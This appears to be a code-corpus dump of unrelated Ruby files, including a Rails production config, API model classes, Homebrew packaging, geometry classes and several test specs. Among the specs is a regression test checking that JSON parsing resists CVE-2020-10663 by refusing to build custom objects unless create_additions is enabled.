Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "leo_tweet_clone_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end

# frozen_string_literal: true
module Git
module Cop
module Styles
class CommitBodyLineLength < Abstract
def self.defaults
{
enabled: true,
severity: :error,
length: 72
}
end
def valid?
commit.body_lines.all? { |line| valid_line? line }
end
def issue
return {} if valid?
{
hint: "Use #{length} characters or less per line.",
lines: affected_lines
}
end
private
def length
settings.fetch :length
end
def valid_line? line
line.length <= length
end
def affected_lines
commit.body_lines.each.with_object([]).with_index do |(line, lines), index|
lines << self.class.build_issue_line(index, line) unless valid_line?(line)
end
end
end
end
end
end
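
# A minimal sketch of the length check above, assuming only that a commit
# exposes body_lines; this Struct stands in for git-cop's real commit object.
StubCommit = Struct.new(:body_lines)
commit = StubCommit.new(["A short body line.", "x" * 80])
limit = 72
commit.body_lines.each_with_index do |line, index|
  puts "Line #{index + 1}: use #{limit} characters or less." if line.length > limit
end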

module Types
class EmailType < Types::BaseObject
field :email, String, null: true
field :purpose, String, null: true
end
end
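
# Hypothetical consumer of the type above, assuming a graphql-ruby schema with
# a Types::QueryType; the resolver simply returns a hash with matching keys.
#   field :contact_email, Types::EmailType, null: true
#   def contact_email
#     { email: "[email protected]", purpose: "support" }
#   end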

require_relative '../spec_helper'
require 'json'
module JSONSpecs
class MyClass
def initialize(foo)
@foo = foo
end
def self.json_create(hash)
new(*hash['args'])
end
def to_json(*args)
{ 'json_class' => self.class.name, 'args' => [ @foo ] }.to_json(*args)
end
end
end
guard -> {
ruby_version_is "2.5.8"..."2.6.0" or
ruby_version_is "2.6.6" or
JSON.const_defined?(:Pure) or
version_is(JSON::VERSION, '2.3.0')
} do
platform_is_not :darwin do
describe "CVE-2020-10663 is resisted by" do
it "only creating custom objects if passed create_additions: true or using JSON.load" do
obj = JSONSpecs::MyClass.new("bar")
JSONSpecs::MyClass.should.json_creatable?
json = JSON.dump(obj)
JSON.parse(json, create_additions: true).class.should == JSONSpecs::MyClass
JSON(json, create_additions: true).class.should == JSONSpecs::MyClass
JSON.load(json).class.should == JSONSpecs::MyClass
JSON.parse(json).class.should == Hash
JSON.parse(json, nil).class.should == Hash
JSON(json).class.should == Hash
end
end
end
end
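
# The distinction under test, in isolation (json stdlib behavior):
#   JSON.parse(json)                          # => plain Hash, safe default
#   JSON.parse(json, create_additions: true)  # may instantiate the json_class
#   JSON.load(json)                           # also honors json_class hooks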

File.open("../DigitalSynthVRA8N/constants.h", "r") do |input|
File.open("./constants.rb", "w") do |output|
input.each_line do |line|
output.puts line.chomp[16..-2]
end
end
end

class Terragrunt < Formula
desc "Thin wrapper for Terraform e.g. for locking state."
homepage "https://github.com/gruntwork-io/terragrunt"
url "https://github.com/gruntwork-io/terragrunt/archive/v0.11.1.tar.gz"
sha256 "997276ea4c42d541b570f72a3e69bf2e889382b54f9c1cf38b337ec9ec0553f5"
head "https://github.com/gruntwork-io/terragrunt.git"
bottle do
cellar :any_skip_relocation
sha256 "486ecb40c9cf8d33992a5ed33e32dedbadec9f3b9329465a9422c2a1687459e4" => :sierra
sha256 "3d21b2ae76fd560dc6a3eea4b5002a971c0e496cc64c449ebfe05299e4f7f9ee" => :el_capitan
sha256 "3e88553f3ea6b07162bd3b16bf17409d048f974e2615fc72f5ea9c1243b49ea0" => :yosemite
end
depends_on "glide" => :build
depends_on "go" => :build
depends_on "terraform"
def install
ENV["GOPATH"] = buildpath
ENV["GLIDE_HOME"] = HOMEBREW_CACHE/"glide_home/#{name}"
mkdir_p buildpath/"src/github.com/gruntwork-io/"
ln_s buildpath, buildpath/"src/github.com/gruntwork-io/terragrunt"
system "glide", "install"
system "go", "build", "-o", bin/"terragrunt", "-ldflags", "-X main.VERSION=v#{version}"
end
test do
assert_match version.to_s, shell_output("#{bin}/terragrunt --version")
end
end

module TomatoShrieker
class EntryTest < TestCase
def setup
@entries = Entry.dataset.all.select(&:feed)
end
test '1レコード以上のエントリが存在するか' do
assert_predicate(@entries, :present?)
end
def test_feed
assert_kind_of(FeedSource, @entries.sample.feed) if @entries.present?
end
def test_create_template
return unless entry = @entries.find(&:create_template)
assert_kind_of(Template, entry.create_template)
assert_kind_of(Template, entry.create_template(:default))
end
def test_uri
return unless entry = @entries.find(&:uri)
assert_kind_of(Ginseng::URI, entry.uri)
end
def test_enclosures
return unless entry = @entries.find(&:enclosures)
assert_kind_of(Array, entry.enclosures)
entry.enclosures.each do |uri|
assert_kind_of(Ginseng::URI, uri)
end
end
def test_tags
return unless entry = @entries.find {|v| v.tags.count.positive?}
entry.tags.each do |tag|
assert_kind_of(String, tag)
end
end
end
end

=begin
#Xero Files API
#These endpoints are specific to Xero Files API
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.1
=end
require 'time'
require 'date'
module XeroRuby::Files
require 'bigdecimal'
class Folder
# The name of the folder
attr_accessor :name
# The number of files in the folder
attr_accessor :file_count
# The email address used to email files to the inbox. Only the inbox will have this element.
attr_accessor :email
# to indicate if the folder is the Inbox. The Inbox cannot be renamed or deleted.
attr_accessor :is_inbox
# Xero unique identifier for a folder Files
attr_accessor :id
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'name' => :'Name',
:'file_count' => :'FileCount',
:'email' => :'Email',
:'is_inbox' => :'IsInbox',
:'id' => :'Id'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'name' => :'String',
:'file_count' => :'Integer',
:'email' => :'String',
:'is_inbox' => :'Boolean',
:'id' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `XeroRuby::Files::Folder` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `XeroRuby::Files::Folder`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'name')
self.name = attributes[:'name']
end
if attributes.key?(:'file_count')
self.file_count = attributes[:'file_count']
end
if attributes.key?(:'email')
self.email = attributes[:'email']
end
if attributes.key?(:'is_inbox')
self.is_inbox = attributes[:'is_inbox']
end
if attributes.key?(:'id')
self.id = attributes[:'id']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
name == o.name &&
file_count == o.file_count &&
email == o.email &&
is_inbox == o.is_inbox &&
id == o.id
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[name, file_count, email, is_inbox, id].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(parse_date(value))
when :Date
Date.parse(parse_date(value))
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BigDecimal
BigDecimal(value.to_s)
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
XeroRuby::Files.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash(downcase: false)
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
key = downcase ? attr : param
hash[key] = _to_hash(value)
end
hash
end
# Returns the object in the form of hash with snake_case
def to_attributes
to_hash(downcase: true)
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
def parse_date(datestring)
if datestring.include?('Date')
seconds_since_epoch = datestring.scan(/[0-9]+/)[0].to_i / 1000.0
Time.at(seconds_since_epoch).utc.strftime('%Y-%m-%dT%H:%M:%S%z').to_s
else # handle date 'types' for small subset of payroll API's
Time.parse(datestring).strftime('%Y-%m-%dT%H:%M:%S').to_s
end
end
end
end
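
# Hypothetical round trip, assuming the generated client above is loaded:
#   folder = XeroRuby::Files::Folder.new(name: 'Inbox', file_count: 3, is_inbox: true)
#   folder.to_hash        # JSON-style keys:  {:Name=>"Inbox", :FileCount=>3, :IsInbox=>true}
#   folder.to_attributes  # snake_case keys:  {:name=>"Inbox", :file_count=>3, :is_inbox=>true}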

# -----------------------------------------------------------------------------
#
# Projected geographic feature classes
#
# -----------------------------------------------------------------------------
module RGeo
module Geographic
class ProjectedPointImpl # :nodoc:
include Feature::Point
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicPointMethods
include ProjectedGeometryMethods
include ProjectedPointMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Point).include_in_class(self, true)
end
class ProjectedLineStringImpl # :nodoc:
include Feature::LineString
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::LineString).include_in_class(self, true)
end
class ProjectedLinearRingImpl # :nodoc:
include Feature::LinearRing
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ImplHelper::BasicLinearRingMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::LinearRing).include_in_class(self, true)
end
class ProjectedLineImpl # :nodoc:
include Feature::Line
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicLineStringMethods
include ImplHelper::BasicLineMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
include ProjectedLineStringMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Line).include_in_class(self, true)
end
class ProjectedPolygonImpl # :nodoc:
include Feature::Polygon
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicPolygonMethods
include ProjectedGeometryMethods
include ProjectedNSurfaceMethods
include ProjectedPolygonMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::Polygon).include_in_class(self, true)
end
class ProjectedGeometryCollectionImpl # :nodoc:
include Feature::GeometryCollection
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ProjectedGeometryMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::GeometryCollection).include_in_class(self, true)
end
class ProjectedMultiPointImpl # :nodoc:
include Feature::MultiPoint
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiPointMethods
include ProjectedGeometryMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiPoint).include_in_class(self, true)
end
class ProjectedMultiLineStringImpl # :nodoc:
include Feature::MultiLineString
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiLineStringMethods
include ProjectedGeometryMethods
include ProjectedNCurveMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiLineString).include_in_class(self, true)
end
class ProjectedMultiPolygonImpl # :nodoc:
include Feature::MultiPolygon
include ImplHelper::BasicGeometryMethods
include ImplHelper::BasicGeometryCollectionMethods
include ImplHelper::BasicMultiPolygonMethods
include ProjectedGeometryMethods
include ProjectedNSurfaceMethods
include ProjectedMultiPolygonMethods
Feature::MixinCollection::GLOBAL.for_type(Feature::MultiPolygon).include_in_class(self, true)
end
end
end

module UsersHelper
# Returns the Gravatar for the given user.
def gravatar_for(user, size: 80)
gravatar_id = Digest::MD5.hexdigest(user.email.downcase)
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}?s=#{size}"
image_tag(gravatar_url, alt: user.name, class: "gravatar")
end
end
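
# Typical call site (hypothetical @user), e.g. in an ERB view:
#   <%= gravatar_for @user, size: 50 %>
# renders an <img> tag whose src embeds the MD5 of the downcased e-mail.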

#
# Copyright 2015, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../../../../spec_helper"
describe "Crowbar::Client::Request::Node::Role" do
it_behaves_like "a request class", true do
subject do
::Crowbar::Client::Request::Node::Role.new(
attrs
)
end
let!(:attrs) do
{
name: "node1",
value: "controller"
}
end
let!(:params) do
{
role: "controller"
}
end
let!(:method) do
:post
end
let!(:url) do
"crowbar/machines/1.0/role/node1"
end
let!(:headers) do
{
"Content-Type" => "application/json",
"Accept" => "application/json"
}
end
end
end

cask 'deco' do
version '0.7.1'
sha256 'cd9d9b553d9fcb706bacba94cbbf7ec80a77609f5505d485b2ebad7c16a8ffba'
# github.com/decosoftware/deco-ide/ was verified as official when first introduced to the cask
url "https://github.com/decosoftware/deco-ide/releases/download/v#{version}/Deco-#{version}.pkg"
appcast 'https://github.com/decosoftware/deco-ide/releases.atom'
name 'Deco'
homepage 'https://www.decosoftware.com/'
# pkg cannot be installed automatically and the .zip of the `app` has errors
installer manual: "Deco-#{version}.pkg"
uninstall pkgutil: 'com.decosoftware.Deco'
zap trash: [
'~/.Deco',
'~/Library/Application Support/com.decosoftware.Deco',
]
end

require 'spec_helper'
require 'support/release_helper'
module Bosh::Director
describe ReleaseJob do
describe 'update' do
subject(:release_job) { described_class.new(job_meta, release_model, release_dir, double(:logger).as_null_object) }
let(:release_dir) { Dir.mktmpdir }
after { FileUtils.rm_rf(release_dir) }
let(:release_model) { Models::Release.make }
let(:job_meta) { {'name' => 'foo', 'version' => '1', 'sha1' => 'deadbeef', 'fingerprint' => 'bar'} }
before { allow(App).to receive_message_chain(:instance, :blobstores, :blobstore).and_return(blobstore) }
let(:blobstore) { instance_double('Bosh::Blobstore::BaseClient') }
let(:job_tarball_path) { File.join(release_dir, 'jobs', 'foo.tgz') }
let(:job_bits) { create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}) }
before { FileUtils.mkdir_p(File.dirname(job_tarball_path)) }
before { allow(blobstore).to receive(:create).and_return('fake-blobstore-id') }
context 'when a template already exists' do
before do
Models::Template.make(
blobstore_id: 'original-blobstore-id',
name: 'foo',
version: '1',
sha1: 'deadbeef',
fingerprint: 'bar',
release_id: release_model.id,
)
end
it 'attempts to delete the existing blob from the blobstore' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:delete).with('original-blobstore-id')
expect(blobstore).to receive(:create).and_return('fake-blobstore-id')
saved_template = release_job.update
expect(saved_template.name).to eq('foo')
expect(saved_template.version).to eq('1')
expect(saved_template.release).to eq(release_model)
expect(saved_template.sha1).to eq('deadbeef')
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
it 'does not bail if blobstore deletion fails' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:delete).and_raise Bosh::Blobstore::BlobstoreError
expect(blobstore).to receive(:create)
saved_template = release_job.update
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
end
describe 'without existing blobstore_id' do
it 'it associates a new blob with the template' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to_not receive(:delete)
expect(blobstore).to receive(:create)
saved_template = release_job.update
expect(saved_template.blobstore_id).to eq('fake-blobstore-id')
end
end
it 'should upload job bits to blobstore' do
File.open(job_tarball_path, 'w') { |f| f.write(job_bits) }
expect(blobstore).to receive(:create) do |f|
f.rewind
expect(::Digest::SHA1.hexdigest(f.read)).to eq(::Digest::SHA1.hexdigest(job_bits))
::Digest::SHA1.hexdigest(f.read)
end
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.name).to eq('foo')
expect(template.version).to eq('1')
expect(template.release).to eq(release_model)
expect(template.sha1).to eq('deadbeef')
end
it 'should fail when it cannot extract job archive' do
result = Bosh::Exec::Result.new('cmd', 'output', 1)
expect(Bosh::Exec).to receive(:sh).and_return(result)
expect { release_job.update }.to raise_error(JobInvalidArchive)
end
it 'whines on missing manifest' do
job_without_manifest =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_manifest: true)
File.open(job_tarball_path, 'w') { |f| f.write(job_without_manifest) }
expect { release_job.update }.to raise_error(JobMissingManifest)
end
it 'whines on missing monit file' do
job_without_monit =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_monit: true)
File.open(job_tarball_path, 'w') { |f| f.write(job_without_monit) }
expect { release_job.update }.to raise_error(JobMissingMonit)
end
it 'does not whine when it has a foo.monit file' do
job_without_monit =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, monit_file: 'foo.monit')
File.open(job_tarball_path, 'w') { |f| f.write(job_without_monit) }
expect { release_job.update }.to_not raise_error
end
it 'saves the templates hash in the template spec' do
job_with_interesting_templates =
create_job('foo', 'monit', {
'template source path' => {'destination' => 'rendered template path', 'contents' => 'whatever'}
}, monit_file: 'foo.monit')
File.open(job_tarball_path, 'w') { |f| f.write(job_with_interesting_templates) }
saved_template = release_job.update
expect(saved_template.spec['templates']).to eq({'template source path' => 'rendered template path'})
end
it 'whines on missing template' do
job_without_template =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}}, skip_templates: ['foo'])
File.open(job_tarball_path, 'w') { |f| f.write(job_without_template) }
expect { release_job.update }.to raise_error(JobMissingTemplateFile)
end
it 'does not whine when no packages are specified' do
job_without_packages =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}},
manifest: { 'name' => 'foo', 'templates' => {} })
File.open(job_tarball_path, 'w') { |f| f.write(job_without_packages) }
job = nil
expect { job = release_job.update }.to_not raise_error
expect(job.package_names).to eq([])
end
it 'whines when packages is not an array' do
job_with_invalid_packages =
create_job('foo', 'monit', {'foo' => {'destination' => 'foo', 'contents' => 'bar'}},
manifest: { 'name' => 'foo', 'templates' => {}, 'packages' => 'my-awesome-package' })
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_packages) }
expect { release_job.update }.to raise_error(JobInvalidPackageSpec)
end
context 'when job spec file includes provides' do
it 'verifies it is an array' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => 'Invalid'})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies that it is an array of hashes' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => ['Invalid', 1]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies hash contains name and type' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies names are unique' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db', 'type' => 'first'}, {'name' => 'db', 'type' => 'second'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(
JobDuplicateLinkName,
"Job 'foo' 'provides' specifies links with duplicate name 'db'"
)
end
it 'saves them on template' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'provides' => [{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.provides).to eq([{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}])
end
end
context 'when job spec file includes consumes' do
it 'verifies it is an array' do
allow(blobstore).to receive(:create).and_return('fake-blobstore-id')
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => 'Invalid'})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies that it is an array of string' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => ['Invalid', 1]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies hash contains name and type' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(JobInvalidLinkSpec)
end
it 'verifies names are unique' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db', 'type' => 'one'}, {'name' => 'db', 'type' => 'two'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect { release_job.update }.to raise_error(
JobDuplicateLinkName,
"Job 'foo' 'consumes' specifies links with duplicate name 'db'"
)
end
it 'saves them on template' do
job_with_invalid_spec = create_job('foo', 'monit', {}, manifest: {'consumes' => [{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'}]})
File.open(job_tarball_path, 'w') { |f| f.write(job_with_invalid_spec) }
expect(Models::Template.count).to eq(0)
release_job.update
template = Models::Template.first
expect(template.consumes).to eq([{'name' => 'db1', 'type' =>'db'}, {'name' => 'db2', 'type' =>'db'} ])
end
end
end
def create_job(name, monit, configuration_files, options = { })
io = StringIO.new
manifest = {
'name' => name,
'templates' => {},
'packages' => []
}.merge(options.fetch(:manifest, {}))
configuration_files.each do |path, configuration_file|
manifest['templates'][path] = configuration_file['destination']
end
Archive::Tar::Minitar::Writer.open(io) do |tar|
manifest = options[:manifest] if options[:manifest]
unless options[:skip_manifest]
tar.add_file('job.MF', {:mode => '0644', :mtime => 0}) { |os, _| os.write(manifest.to_yaml) }
end
unless options[:skip_monit]
monit_file = options[:monit_file] ? options[:monit_file] : 'monit'
tar.add_file(monit_file, {:mode => '0644', :mtime => 0}) { |os, _| os.write(monit) }
end
tar.mkdir('templates', {:mode => '0755', :mtime => 0})
configuration_files.each do |path, configuration_file|
unless options[:skip_templates] && options[:skip_templates].include?(path)
tar.add_file("templates/#{path}", {:mode => '0644', :mtime => 0}) do |os, _|
os.write(configuration_file['contents'])
end
end
end
end
io.close
gzip(io.string)
end
end
end
| 40.729097 | 167 | 0.602151 |
b9db5267245018373dbda3b09848bb06f79ef8eb | 14,654 | # frozen_string_literal: true
require 'spec_helper'
require 'assets'
describe 'Assets' do
before(:all) { @subject = Assets.new }
subject { @subject }
def render(**needs)
subject.html('assets/app/app.rb', **needs)
end
describe '#html' do
it 'renders logged out' do
expect(render).to include('Welcome!')
end
it 'renders home logged in' do
expect(render(user: { name: 'toby', settings: { consent: true } })).to include('Welcome toby!')
end
it 'consent logged in' do
expect(render(user: { name: 'toby' })).to include('I agree to the privacy policy')
end
it 'renders about' do
expect(render(app_route: '/about')).to include('created and maintained')
end
it 'renders tiles' do
expect(render(app_route: '/tiles/all')).to include('Generic Map Hexes')
expect(render(app_route: '/tiles/57')).to include('57')
expect(render(app_route: '/tiles/18Chesapeake')).to include('I9')
expect(render(app_route: '/tiles/18Chesapeake/I9')).to include('I9')
expect(render(app_route: '/tiles/18Chesapeake/X1')).to include('X1')
x2_x3 = render(app_route: '/tiles/18Chesapeake/X2+X3')
expect(x2_x3).to include('X2')
expect(x2_x3).to include('X3')
aggregate_failures 'location name for all stop types' do
with_loc_names = render(app_route: '/tiles/18Chesapeake/B2+H6+K3')
%w[B2 Pittsburgh H6 Baltimore K3 Trenton Amboy D&R].each do |str|
expect(with_loc_names).to include(str)
end
end
multiple_games = render(app_route: '/tiles/1889+18Chesapeake')
expect(multiple_games).to include('Kouchi')
expect(multiple_games).to include('Delmarva')
%w[1889 18Chesapeake].each do |title|
expect(render(app_route: "/tiles/#{title}")).to include("#{title} Map Hexes")
expect(render(app_route: "/tiles/#{title}")).to include("#{title} Tile Manifest")
expect(render(app_route: "/tiles/#{title}")).not_to include('TODO')
end
end
it 'renders login' do
expect(render(app_route: '/login')).to include('Login')
end
it 'renders signup' do
expect(render(app_route: '/signup')).to include('Signup')
end
context '/map' do
{
# games with config but not full implementation; just do a quick spot check
'1817' => %w[Pittsburgh],
'1817NA' => %w[
Anchorage The Klondike Dawson City Hazelton Arctic Edmonton Winnipeg
Quebec Europe Seattle Denver Toronto New York Hawaii Los Angeles
Guadalajara Mexico City Miami New Orleans Belize South America
20 30 40 50 60 80 15 10 B Asia
],
'1846' => %w[Chicago],
# games with full implementation; verify every string on the map
'1889' => %w[
1 10 11 12 13 14 2 20 3 30 4 40 5 6 60 7 8 80 9 A AR Anan Awaji B C D
D100 D80 E ER F G H I IR Ikeda Imabari J K KO Komatsujima Kotohira
Kouchi Kouen KU Kubokawa L Marugame Matsuyama Muki Muroto Nahari
Nakamura Nangoku Naruto Niihama Ohzu Okayama Ritsurin SR Saijou
